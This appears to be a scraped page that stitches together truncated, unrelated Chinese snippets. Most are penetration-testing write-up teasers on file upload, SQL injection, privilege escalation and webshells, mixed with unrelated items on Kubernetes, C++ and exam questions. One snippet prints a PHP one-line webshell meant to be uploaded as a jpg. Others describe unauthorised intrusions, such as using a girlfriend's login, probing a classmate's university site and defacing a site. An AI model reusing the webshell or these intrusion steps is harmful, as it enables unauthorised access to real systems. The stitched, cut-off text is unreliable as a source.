记一次CSDN文件上传漏洞XSS攻击

前言随着当前攻防水平的不断提高，实战攻防过程中，经常能遇到前端的参数被各种各样的方式加密的情况。毫无疑问，这种方式能够防止很多脚本小子的脚步，但是很多网站就存在“金玉其外，败絮其内“的情况，将传递的参数加密了事，忽略很多系统本身存在的安全风险。本文以实战角度出发，介绍面对这种防重放的情况下的攻防技巧。背景某次渗透测试项目，笔者经过测试发现该网站部分关键数据包使用JS加密，并且请求包还添加相关参数用

一、说明公司K8S集群配置需要，需要重新调整网络结构网络架构：网络架构说明：是一台路由器，接一台交换机，下面串两台交换机路由器：192.168.10.2523台交换机：没有做任何配置（12、13、14机柜交换机）二、需求新集群需要复用老集群的3台机柜交换机新集群总体上包含多个单独子网的网段，每个网段中有一个集群新集群的master节点需要继续使用老集群中的两台ESXI服务器三、新架构拓扑思路说明：

SQL 注入的原理是应用程序没有对用户输入进行充分的验证和过滤，导致者可以在输入框中插入恶意的 SQL 代码。当应用程序将用户输入的数据拼接到 SQL 查询语句中时，者插入的恶意代码也会被执行，从而绕过身份验证和访问控制，直接访问或修改数据库中的数据。

刚开始一个上传的页面，尝试了txt,png,ppt,php,这些常见的后缀文件发现都能上传成功，并且页面一点回显都没有，自己都不知道是被过滤了什么类型的文件，后面不经意间打开了自己的证件照，是jpg格式的，于是尝试上传，没想到就成功上传了知道jpg类型可以上传之后，开始写一句话木马  <?php @eval($_REQUEST["shell"]); ?>修改木马文件的格式为j

正常我们挖逻辑漏洞一般都是从越权开始挖起，但是一般这些越权的参数基本都做了加密处理，刚好今天接了一个项目，感

直播struts2漏洞利用

http://xxxxx/index.html?userNo=xxxx可以直接登录学生用户(女朋友给的)fofa收集了一波4个站点。。。，由于没扫到备份，只能黑盒测了然后发现一处接口 杂七杂八测试了下，发现有意思的一处接口泄露用户信息自己用户是返回自己角色标识参数是SYS004已知(已知是因为社工拿到了管理员账户)管理员参数是SO1和SYS001我们把我们的登录参数改成对应是管理员参数成功以管理员

万事都有起因，这次也不例外。 这次起因是补天又搞了个活动，听说有证书拿，为了刷刷简历，所以就….。

前段时间的比赛将该cms作为了题目考察，这个cms的洞也被大佬们吃的差不多了，自己也就借此机会来浅浅测试下这个cms残余漏洞，并记录下这一整个流程，谨以此记给小白师傅们分享下思路，有错误的地方还望大佬们请以指正。

1、“Content-Security-Policy”头缺失 在网上查了关于这个响应头的说明，CSP相当于前台的白名单，用来限制网站内部一些资源获取的，如限制CSS、JS、图片或者第三方链接等。 CSP的设置可以在一定程度上限制XSS，有2种方式可以设置。第一种通过设置HTTP响应头，另一种

实际测试中，发现account参数存在拼接注入如下经过一番操作知道了数据库中共八个字段，分别是uid ,account ,password,safe_password,telphone,username,createtime,super第五个字段是手机号，由于登陆页面需要发送手机验证码寻找其发送短信的接口，/admin/account/getSmsCodeForLogin同样的account参数存

0x00：前言上面给了个任务，一看，地图系统，懵逼了，这种的系统一般就是调个百度地图的api，无交互，想要挖

在群里闲聊时，看到颜夏大佬在打钓鱼站，由于是虚拟机主机就直接删站挂黑页了(装装逼嘛) 1.png[https://colcool.com/usr...

本文作者：某小六 (Ms08067安全实验室SRSP TEAM)   有意思的文件上传开始  0x01文件上传漏洞的概念 由于站点对上传文件未作过滤或过滤机制不严（文件后缀或类型），导致恶意用户可以上传脚本文件，通过上传文件可达到控制网站权限的目的。  0x02 Getshell之路 1.寻找漏洞 打开授权测试网站，发现页面功能单一（登记、查询），  登

客户给了个站 授权渗透客户要求：纯黑盒 无测试账号就一个登录框 忘记密码功能还是这样人直接傻了   先看看能不能爆破吧发现密码加密了好家伙 还是动态密钥验证一下发现确实 两个一样的密码加密不一样96e437f990f8df4078b535d40a53bdeddaa0c2503376f30ad2ec93ba5883fd4393909ba2bd1ae0d3d5e64ba10a2f2d617423a9f

无论是linux系统，还是windows系统，我们都有可能因为各种原因导致程序崩溃，那么这种情况下如何确认崩溃在哪了呢？windows系统这里是采用windows的api来产生dump文件产生minidump的方法，网上都有，可以搜一下。#include"DumpManager.h"voidmain(){DumpManagerdump_manager(true);char*p=NULL;memcp

业务逻辑漏洞：由于程序逻辑不严谨或逻辑太过复杂，导致一些逻辑分支不能正常处理或处理错误，统称为业务

晚上在测试使用七牛云SDK从服务器上传图片到七牛云对象存储的时候发现代码跑不起来，报错，错误如下Exception in thread "main" java.lang.NoSuchFieldError: Companion at okhttp3.internal.Util.<clinit>(Util.kt:70) at okhttp3.Dispatcher.promoteAndE

记一次入侵站点由于自己的心血来潮，突然想检测一下高中同学所在大学站点的安全（美其名曰：检测）。1.先查看下该站点的后台登录界面，看有突破否，答案是yes,在某个学院的站点上有一个弱口令哦。2.残忍的拿下其webshell，呵呵呵呵呵呵呵呵。。。。。3.唉，不对，他的外网IP和主站根本不在同一网站，世界在旋转，那我忙活这么久，怎么。。。。4.继续吧，在google中好像又发现了什么，在主站同一网段下

前提Android五种数据存储方式： 1. 使用SharedPreferences存储数据 2. 文件存储数据 3. SQLite存储数据 4. ContentProvider 5. 网络存储Android几种数据存储方式的应用场景正文前段时间由于很多人反馈页面无数据的bug，对此考究了一段时间，遂将结果记录于此。

头文件 < fstream> c++中有一个stream，所有的I/O都是以这个流类为基础的。继承结构如下图： a.”<<”插入器，向流输出数据； b.”>>”析取器，向流输出数据； 我们主要讨论ifstream和ofstream ifstream 和ofsteam 包含在头文件fstream中。 ofstream 是从内存读到硬盘； ifstream

公告： 为响应国家净网行动，部分内容已经删除，感谢读者理解。话题：开机硬盘指示灯闪了一下就不亮是怎么回事回答：原因：1，重新下显卡和内存条以及硬盘连接线。2，硬盘有坏。(表现为：有异响，无程序运行时，硬盘指示灯狂闪。)话题：开机硬盘指示灯闪了一下就不亮是怎么回事回答：看情况应该是系统问题，别嫌麻烦，重装系统吧，应该可以解决；如果不重装，清理表比重装还麻烦话题：我的电脑能正常启动,但硬盘灯一直亮着不

1.11 需求管理（Requirements Management）企业架构开发方法各阶段——需求管理1.11.1 目标      本阶段的目标是定义一个过程，使企业架构的需求可以被识别、存储并与其他架构开发方法各阶段交互。1.11.2 方法      如上图所示，需求管理阶段位于整个架构开发方法循

下面是CN人才网小编整理的计算机二级试题，希望对大家有所帮助。一、选择题(每小题1分，共40分)(1)下列叙述中正确的是( )。A.算法就是程序B.设计算法时只需要考虑数据结构的设计C.设计算法时只需要考虑结果的可靠性D.以上三种说法都不对(2)下列叙述中正确的是( )。A.有一个以上根结点的数据结构不一定是非线性结构B.只有一个根结点的数据结构不一定是线性结构C.循环链表是非线性结构D.双向链表

信号量：PV操作，对进程进行同步。共享内存正常情况下，将一块物理内存分配给A进程，是不能够同时分配给B进程(一个物理进程只能属于某一个进程)。两个进程是相互独立，A进程结束，释放内存，不会影响其他进程。如何将同一个物理空间映射到不同的逻辑地址空间？ 执行代码ipcs,显示消息队列，共享内存和信号量 如果仅仅想看共享内存，则执行代码：ipcs -m 创建共享内存空间，代码如下： 我们可以发现，共享内